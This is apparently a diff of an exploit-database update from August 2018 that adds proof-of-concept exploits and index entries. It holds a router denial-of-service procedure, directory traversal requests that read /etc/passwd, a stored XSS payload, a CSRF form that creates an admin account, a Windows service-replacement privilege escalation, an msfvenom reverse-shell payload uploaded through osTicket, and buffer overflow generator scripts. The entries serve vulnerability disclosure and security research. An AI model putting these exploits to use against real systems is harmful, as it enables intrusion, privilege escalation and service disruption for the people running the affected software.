DB: 2018-08-09

9 changes to exploits/shellcodes

TP-Link Wireless N Router WR840N - Denial of Service (PoC)

Splinterware System Scheduler Pro 5.12 - Privilege Escalation
iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow
iSmartViewPro 1.5 - 'Account' Buffer Overflow

OpenEMR < 5.0.1 - Remote Code Execution

Kirby CMS 2.5.12 - Cross-Site Scripting
osTicket 1.10.1 - Arbitrary File Upload
LG-Ericsson iPECS NMS 30M - Directory Traversal
LAMS < 3.1 - Cross-Site Scripting
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)
Monstra 3.0.4 - Cross-Site Scripting
LAMS < 3.1 - Cross-Site Scripting
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)
Monstra 3.0.4 - Cross-Site Scripting

exploits/hardware/dos/45168.txt

@@ -0,0 +1,22 @@
+# Exploit Title:- TP-Link Wireless N Router WR840N - Denial of Service (PoC)
+# Date: 2018-08-05
+# Vendor Homepage: https://www.tp-link.com/
+# Hardware Link:  https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
+# Version: TP-Link Wireless N Router WR840N
+# Category: Hardware
+# Exploit Author:  Aniket Dinda
+# Tested on: Windows 10
+# Web: https://hackingvila.wordpress.com
+# CVE: N/A
+
+# Proof Of Concept:
+
+1- First connect to this network.
+2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser.
+3- Go to Quick setup. 
+4- Now as the Burp is intercept is on, you will find an Authorization: Basic followed by a string. 
+5- Now we paste a string consisting of 2000 zeros.
+6- Then forward the connection.
+7- Then your router automatically logout and net connection will be gone.
+
+You have to reboot your router before it becomes available again.

exploits/hardware/webapps/45021.txt

@@ -4,6 +4,7 @@
 # Exploit Author: Safak Aslan
 # Software Link: http://www.celalink.com
 # Version: 2.7.1.6
+# CVE: 2018-15137
 # Authentication Required: No
 # Tested on: Windows
 

exploits/linux/webapps/45167.txt

@@ -0,0 +1,24 @@
+# Exploit Title: LG-Ericsson iPECS NMS 30M - Directory Traversal
+# Shodon Dork: iPECS CM
+# Exploit Author: Safak Aslan
+# Software Link: www.ipecs.com
+# Version: 30M (System)
+# Authentication Required: No
+# Tested on: Linux
+# CVE: N/A
+
+# Description
+# The directory traversal was detected on LG-Ericsson's iPECS product that
+# can be exploited to reach sensitive info on the vulnerable system. 
+# Ericsson-LG iPECS NMS 30M allows directory traversal via 
+# ipecs-cm/download?filename=../ URIs.
+
+# The GET input of the "filename" has been set to ../../../../../../../../../../etc/passwd.
+# By the sending of the below GET request, it is possible to reach configuration files directly.
+
+targetIP/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data 
+
+# The GET input of the "filepath" has been set to ../../../../../../../../../../etc/passwd%00.jpg.
+# By the sending of the below GET request, it is possible to reach configuration files directly.
+
+targetIP/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg

exploits/php/webapps/45068.txt

@@ -0,0 +1,20 @@
+# Exploit Title:​​ Kirby CMS 2.5.12 - Cross-Site Scripting
+# Date: 2018-07-22
+# Exploit Author: Zaran Shaikh
+# Version: ​2.5.12
+# CVE :  ​NA
+# Category: ​Web Application
+
+# Description
+# The application allows user injected payload which can lead to Stored
+# Cross Site Scripting.
+
+# Proof of Concept
+# 1. Visit the application as low priv user
+# 2. Go to add page option
+# 3. Under title, enter any XSS payload like:
+
+<script>alert("XSS");</script>
+
+# 4. Upon the payload being injected, the subsequent page is triggered
+# with XSS

exploits/php/webapps/45154.html

@@ -14,7 +14,7 @@ the appilication is vulnerable to CSRF attack (No CSRF token in place) meaning t
 <html>
   <body>
   <script>history.pushState('', '', '/')</script>
-    <form action="https://vulnapp.com/path/admin/members.php?a=add_member&ajax=1"method="POST">
+    <form action="https://server/path/admin/members.php?a=add_member&ajax=1"method="POST">
       <input type="hidden" name="username" value="r3m0t3nu11" />
       <input type="hidden" name="email" value="l0v3rs14&#64;gmail&#46;com"/>
       <input type="hidden" name="password" value="123123" />

exploits/windows/local/45072.txt

@@ -0,0 +1,62 @@
+# Exploit Title: Splinterware System Scheduler Pro 5.12 - Privilege Escalation
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Date: 2018-07-21
+# Vulnerable Software: System Scheduler Pro 5.12
+# Vendor Homepage: https://www.splinterware.com
+# Version: 5.12
+# Tested Windows 7 SP1 x86
+# CVE: N/A
+
+# Description:
+# Splinterware System Scheduler Pro 5.12 suffers from 
+# Privilege Escalation due to insecure file permissions
+
+# Prerequisites
+# To successfully exploit this vulnerability, the System Scheduler service must already be installed.
+
+# Details
+# By default the Everyone group has the modify permission to System Schedule files as shown below.  
+# With the service installed, a low privilege account is able to rename the WService.exe file located in 
+# this same path and replace with a malicious file that would connect back to an attacking computer giving system level privileges 
+# (nt authority\system) due to the service running as Local System.  While a low privilege user is unable to restart the service 
+# through the application, the service is checked periodically triggering the execution of the malicious file.
+
+C:\>icacls "c:\Program Files (x86)\SystemScheduler"
+Everyone:(OI)(CI)(M)
+NT SERVICE\TrustedInstaller:(I)(F)
+NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+BUILTIN\Users:(I)(RX)
+BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+
+C:\>sc qc WindowsScheduler
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WindowsScheduler
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\PROGRA~2\SYSTEM~1\WService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : System Scheduler Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+		
+# Proof of Concept
+1. Login as regular user where Splinterware System Scheduler Pro 5.12 and the service are installed 
+2. Create malicious .exe with same name 'wservice.exe' that can connect back to attacking machine
+3. Download malicious .exe on victim machine, and setup listener on attacking machine
+4. Rename original wservice.exe file to wservice.bak, and copy malicious file to location of original   
+5. wait short amount of time and check attacking machine listener
+6. connection back from victim machine successful, run whoami
+
+nt authority\system

exploits/windows/webapps/45169.txt

@@ -0,0 +1,31 @@
+# Exploit Title: osTicket 1.10.1 - Arbitrary File Upload
+# Exploit Author: r3j10r (Rajwinder Singh)
+# Date: 2018-08-08
+# Vendor Homepage: http://osticket.com/
+# Software Link: http://osticket.com/download
+# Version: osTicket v1.10.1
+# CVE-2017-15580
+
+# Vulnerability Details:
+# osTicket application provides a functionality to upload 'html' files 
+# with associated formats. However, application does not properly validate 
+# the content of file and accepts any type of files.
+
+# Proof-of-Concept:
+# Uploaded shell to get reverse shell of end user for the demo purpose.
+
+1. Created a valid '.html' file to bypass client-side validations.
+ <html>
+  <title>test</title>
+  <body>
+   <p>test page</p>
+  </body>
+ </html>
+2. Created a reverse shell with '.exe' file extension using msfvenom.
+msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<YOUR IP> LPORT=4444 -b "\x00" -e <encoder> -f exe -o reverse.exe
+3. Intercepted the request in BurpSuite and changed file extension '.html' to '.exe' and its content
+4. Received a valid response from server along with uploaded malicious file.
+5. Got reverse shell after execution of the uploaded payload.
+
+# Affected Component:
+Parameter: tickets.php?id=<ticket_number>#reply

exploits/windows_x86-64/local/45165.py

@@ -0,0 +1,29 @@
+# Exploit Title: iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow
+# Author: Rodrigo Eduardo Rodriguez
+# Discovery Date: 2018-08-07
+# Vendor Homepage: https://securimport.com/
+# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
+# Tested Version: 1.5
+# Vulnerability Type: Buffer Overflow Local
+# Tested on OS: Windows 10 Pro x64 es
+ 
+# Steps to Produce the BoF: 
+# 1.- Run python code : python generatepaste.py
+# 2.- Open generate.txt and copy content to clipboard
+# 3.- Open iSmartViewPro
+# 4.- clic button "+"
+# 5.- Select "add device manually"
+# 6.- paste ClipBoard on "Device Alias"
+# 7.- DNS/IP/DID -> "0.0.0.0"
+# 8.- acount -> "admin"
+# 9.- password -> "admin"
+# 10.- Save
+# 11.- BoF
+ 
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+buffer = "\x41" * 415
+eip = "\x42" * 4
+f = open ("generate.txt", "w")
+f.write(buffer + eip)
+f.close()

exploits/windows_x86-64/local/45166.py

@@ -0,0 +1,28 @@
+# Exploit Title: iSmartViewPro 1.5 - 'Account' Buffer Overflow
+# Discovery by: Alan Joaquín Baeza Meza
+# Discovery Date: 2018-08-07
+# Vendor Homepage: http://www.securimport.com/n/en/
+# Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
+# Tested Version: 1.5
+# Tested on OS  : Windows 10 Pro x64 es
+
+# Steps to Produce the BoF: 
+# 1.- Run python code : python generatepaste.py
+# 2.- Open generate.txt and copy content to clipboard
+# 3.- Open iSmartViewPro
+# 4.- Add device manually
+# 5.- Device alias -> A
+# 6.- Device Type-> SmartP2P
+# 7.- DDNS/IP/DID-> 0.0.0.0
+# 8.- Paste ClipBoard on "Account"
+# 9.- Password -> A
+#10.- Aceptar
+#11.- BoF
+
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+buffer = "\x41" * 479
+eip= "\x42" * 4
+f = open ("generate.txt", "w")
+f.write(buffer+eip)
+f.close()

files_exploits.csv

@@ -6038,6 +6038,7 @@ id,file,description,date,author,type,platform,port
 45121,exploits/multiple/dos/45121.txt,"WebRTC - VP8 Block Decoding Use-After-Free",2018-08-01,"Google Security Research",dos,multiple,
 45122,exploits/multiple/dos/45122.txt,"WebRTC - FEC Processing Overflow",2018-08-01,"Google Security Research",dos,multiple,
 45123,exploits/multiple/dos/45123.txt,"WebRTC - H264 NAL Packet Processing Type Confusion",2018-08-01,"Google Security Research",dos,multiple,
+45168,exploits/hardware/dos/45168.txt,"TP-Link Wireless N Router WR840N - Denial of Service (PoC)",2018-08-08,"Aniket Dinda",dos,hardware,80
 45162,exploits/windows_x86-64/dos/45162.py,"QNap QVR Client 5.0.3.23100 - Denial of Service (PoC)",2018-08-07,"Rodrigo Eduardo Rodriguez",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
@@ -9841,6 +9842,7 @@ id,file,description,date,author,type,platform,port
 45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple,
 45058,exploits/linux/local/45058.rb,"Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)",2018-07-19,Metasploit,local,linux,
 45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,
+45072,exploits/windows/local/45072.txt,"Splinterware System Scheduler Pro 5.12 - Privilege Escalation",2018-07-23,bzyo,local,windows,
 45126,exploits/solaris/local/45126.c,"Sun Solaris 11.3 AVS - Local Kernel root Exploit",2018-08-02,mu-b,local,solaris,
 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
@@ -9854,6 +9856,8 @@ id,file,description,date,author,type,platform,port
 45142,exploits/windows/local/45142.py,"Wedding Slideshow Studio 1.36 - Buffer Overflow",2018-08-03,Achilles,local,windows,
 45147,exploits/linux/local/45147.rb,"Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)",2018-08-03,Metasploit,local,linux,
 45149,exploits/windows_x86-64/local/45149.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation",2018-08-05,"sickness & mschenk",local,windows_x86-64,
+45165,exploits/windows_x86-64/local/45165.py,"iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow",2018-08-08,"Rodrigo Eduardo Rodriguez",local,windows_x86-64,
+45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39703,7 +39707,7 @@ id,file,description,date,author,type,platform,port
 44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
 45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
-45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,
+45161,exploits/php/webapps/45161.py,"OpenEMR < 5.0.1 - Remote Code Execution",2018-08-07,"Cody Zacharias",webapps,php,80
 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
 45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware,
 45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80
@@ -39729,6 +39733,7 @@ id,file,description,date,author,type,platform,port
 45062,exploits/php/webapps/45062.txt,"MSVOD 10 - 'cid' SQL Injection",2018-07-20,Hzllaga,webapps,php,
 45063,exploits/hardware/webapps/45063.txt,"Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass",2018-07-20,vulnc0d3,webapps,hardware,
 45083,exploits/php/webapps/45083.rb,"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)",2018-07-24,"Mehmet Ince",webapps,php,
+45068,exploits/php/webapps/45068.txt,"Kirby CMS 2.5.12 - Cross-Site Scripting",2018-07-23,"Zaran Shaikh",webapps,php,
 45160,exploits/windows/webapps/45160.txt,"Open-AudIT Community 2.2.6 - Cross-Site Scripting",2018-08-06,"Ranjeet Jaiswal",webapps,windows,
 45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware,
 45073,exploits/linux/webapps/45073.txt,"Synology DiskStation Manager 4.1 - Directory Traversal",2018-07-23,"Berk Dusunur",webapps,linux,
@@ -39745,6 +39750,8 @@ id,file,description,date,author,type,platform,port
 45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80
 45131,exploits/php/webapps/45131.py,"CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection",2018-08-02,0x09AL,webapps,php,
 45133,exploits/xml/webapps/45133.txt,"Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection",2018-08-02,"Chris Moberly",webapps,xml,
+45169,exploits/windows/webapps/45169.txt,"osTicket 1.10.1 - Arbitrary File Upload",2018-08-08,"Rajwinder Singh",webapps,windows,
+45167,exploits/linux/webapps/45167.txt,"LG-Ericsson iPECS NMS 30M - Directory Traversal",2018-08-08,"Safak Aslan",webapps,linux,80
 45135,exploits/hardware/webapps/45135.txt,"ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution",2018-08-02,"Fakhri Zulkifli",webapps,hardware,
 45136,exploits/windows/webapps/45136.py,"Seq 4.2.476 - Authentication Bypass",2018-08-02,"Daniel Chactoura",webapps,windows,
 45140,exploits/php/webapps/45140.txt,"Basic B2B Script 2.0.0 - Cross-Site Scripting",2018-08-03,"Vikas Chaudhary",webapps,php,80
@@ -39754,6 +39761,6 @@ id,file,description,date,author,type,platform,port
 45146,exploits/xml/webapps/45146.txt,"Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection",2018-08-03,"Chris Moberly",webapps,xml,
 45148,exploits/cgi/webapps/45148.txt,"cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal",2018-08-03,"Google Security Research",webapps,cgi,80
 45150,exploits/php/webapps/45150.txt,"Subrion CMS 4.2.1 - Cross-Site Scripting",2018-08-06,"Zeel Chavda",webapps,php,
-45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,
-45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,
-45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,
+45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
+45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
+45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80